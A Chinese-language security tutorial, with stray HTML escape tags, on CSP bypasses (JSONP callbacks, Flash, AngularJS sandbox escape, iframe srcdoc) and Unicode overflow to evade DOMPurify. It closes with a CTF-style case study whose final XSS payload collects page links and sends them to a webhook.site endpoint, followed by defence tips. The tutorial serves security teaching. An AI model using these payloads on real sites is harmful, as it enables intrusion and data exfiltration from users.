Unicode溢出与CSP Bypass技术详解<\/h1>

0x00 前言<\/h2>
内容安全策略(CSP)是一种重要的网页安全机制，用于定义网页可以加载和执行哪些资源。本文将从CSP基础开始，深入探讨Unicode溢出原理及其在XSS防御绕过中的应用，最后结合实战案例展示如何利用这些技术绕过现代Web安全防护。<\/p>

0x01 CSP基础与Bypass技术<\/h2>

CSP指令详解<\/h3>

script-src<\/strong>: 指定允许的JavaScript源<\/li>
default-src<\/strong>: 默认资源获取策略<\/li>
child-src<\/strong>: 指定子资源使用策略<\/li>
frame-src<\/strong>: 限制可作为框架调用的URL<\/li>
frame-ancestors<\/strong>: 指定页面可被嵌入的源<\/li>
img-src<\/strong>: 定义图像加载源<\/li>
object-src<\/strong>: 定义对象、嵌入和小部件的允许源<\/li>
base-uri<\/strong>: 定义元素允许加载的URL<\/li>

sandbox<\/strong>: 创建资源沙盒环境<\/li> <\/ol>
CSP指定值<\/h3>

*<\/code>: 允许除data:、blob:、filesystem:外的任何URL<\/li>
none<\/code>: 禁止加载任何源<\/li>
self<\/code>: 仅允许同源资源<\/li>
data<\/code>: 允许数据URI方案<\/li>
unsafe-eval<\/code>: 允许eval()等动态代码执行<\/li>
unsafe-hashes<\/code>: 启用特定内联事件处理程序<\/li>
unsafe-inline<\/code>: 允许内联资源<\/li>
nonce<\/code>: 基于随机数的内联脚本白名单<\/li>
sha256-<hash><\/code>: 基于哈希值的脚本白名单<\/li> <\/ul> 常见CSP绕过技术<\/h3> 1. JSONP滥用<\/h4> 当CSP允许特定外部域时：<\/p> <meta<\/span> http-equiv<\/span>=<\/span>"Content-Security-Policy"<\/span> content<\/span>=<\/span>"script-src 'self' https:\/\/www.google.com https:\/\/accounts.google.com;"<\/span>> <\/span><\/span><\/code><\/pre>可利用回调接口绕过：<\/p> <script<\/span> src<\/span>=<\/span>"https:\/\/accounts.google.com\/o\/oauth2\/revoke?callback=alert(\/xss\/)"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre>2. object-src\/default-src缺失利用<\/h4> 当缺少这些限制时，可利用Flash对象攻击(已过时)：<\/p> <object<\/span> type<\/span>=<\/span>"application\/x-shockwave-flash"<\/span> data<\/span>=<\/span>'https:\/\/ajax.googleapis.com\/ajax\/libs\/yui\/2.8.0r4\/build\/charts\/assets\/charts.swf?allowedDomain=\"})))}catch(e){alert(\/xss\/)}\/\/'<\/span>> <\/span><\/span> <param<\/span> name<\/span>=<\/span>"AllowScriptAccess"<\/span> value<\/span>=<\/span>"always"<\/span>> <\/span><\/span><\/object<\/span>> <\/span><\/span><\/code><\/pre>3. AngularJS利用<\/h4> 当CSP允许AngularJS时：<\/p> <script<\/span> src<\/span>=<\/span>"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/angular.js\/1.4.6\/angular.js"<\/span>><\/script<\/span>> <\/span><\/span><div<\/span> data-ng-app<\/span>>{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(\/xss\/);\/\/');}}<\/div<\/span>> <\/span><\/span><\/code><\/pre>4. iframe绕过<\/h4> 利用srcdoc属性：<\/p> <iframe<\/span> srcdoc<\/span>=<\/span>'<script src="data:text\/javascript,alert(\/xss\/)"><\/script>'<\/span>><\/iframe<\/span>> <\/span><\/span><\/code><\/pre>0x02 Unicode溢出原理<\/h2> Unicode溢出发生在服务器尝试将Unicode字符存储在单字节中。由于字节最大值为255，构造特定Unicode字符可导致溢出生成目标ASCII字符。<\/p> Unicode溢出示例<\/h3> const<\/span> content<\/span> =<\/span> Buffer<\/span>.from<\/span>("57C8"<\/span>,"base64"<\/span>).toString<\/span>("ascii"<\/span>) <\/span><\/span>console<\/span>.log<\/span>(content<\/span>) \/\/ 输出"<"字符 <\/span><\/span><\/span><\/code><\/pre>JavaScript中的fromCharCode()<\/code>也存在类似溢出问题，仅支持0-0xFFFF范围，输入更大值会导致溢出。<\/p> Unicode溢出字符查询<\/h3> 专业查询工具：Shazzer Unicode Table<\/a><\/p> 示例溢出字符对：<\/p> 氼氼<\/code> → <<\/code><\/li> 夾<\/code> → ><\/code><\/li> <\/ul> 0x03 实战案例解析<\/h2> 漏洞场景<\/h3> \/create<\/code>端点：使用DOMPurify过滤XSS<\/li> \/note<\/code>端点：使用ASCII处理字符串，存在Unicode溢出漏洞<\/li> <\/ol> 攻击步骤<\/h3> 构造基本XSS Payload<\/strong><\/li> <\/ol> 氼氼script src="https:\/\/www.example.com"夾alert(1);\/\/氼氼\/script 夾 <\/span><\/span><\/code><\/pre> 绕过CSP限制<\/strong><\/li> <\/ol> 利用\/redirect<\/code>接口和AngularJS组件：<\/p> 氼氼script src="http:\/\/localhost:3000\/redirect?url=https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/angular.js\/1.4.6\/angular.js" 夾 \/\/氼氼\/script 夾 <\/span><\/span><div<\/span> data-ng-app<\/span>> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);\/\/');}} <\/div<\/span>> <\/span><\/span><\/code><\/pre> 完整攻击Payload<\/strong><\/li> <\/ol> 氼氼script src="http:\/\/localhost:3000\/redirect?url=https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/angular.js\/1.4.6\/angular.js" 夾 \/\/氼氼\/script 夾 <\/span><\/span><div<\/span> data-ng-app<\/span>>{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } }; <\/span><\/span> fetch(`http:\/\/localhost:3000\/`).then(res=>res.text()).then(data=>{ <\/span><\/span> const parser = new DOMParser(); <\/span><\/span> const doc = parser.parseFromString(data, "text\/html"); <\/span><\/span> const links = Array.from(doc.querySelectorAll("a")).map(a => a.href); <\/span><\/span> const encodedLinks = btoa(unescape(encodeURIComponent(JSON.stringify(links)))); <\/span><\/span> return fetch("https:\/\/webhook.site\/5b154691-3fdb-46b8-980b-735e19b081f2?ans=" + encodedLinks, { <\/span><\/span> method: "GET", <\/span><\/span> mode: "no-cors" <\/span><\/span> })});\/\/');}}<\/div<\/span>> <\/span><\/span><\/code><\/pre>防御建议<\/h2> 统一字符编码处理，避免混合编码<\/li> 严格限制重定向功能<\/li> 谨慎评估第三方库风险<\/li> 实施完整的CSP策略，避免关键指令缺失<\/li> 定期更新XSS过滤库<\/li> <\/ol> 参考资源<\/h2> Unicode Overflow Research<\/a><\/li> CSP Specification<\/a><\/li> CSP Bypass Techniques<\/a><\/li> CSP Evaluator<\/a><\/li> Web Hacking Techniques<\/a><\/li> <\/ol>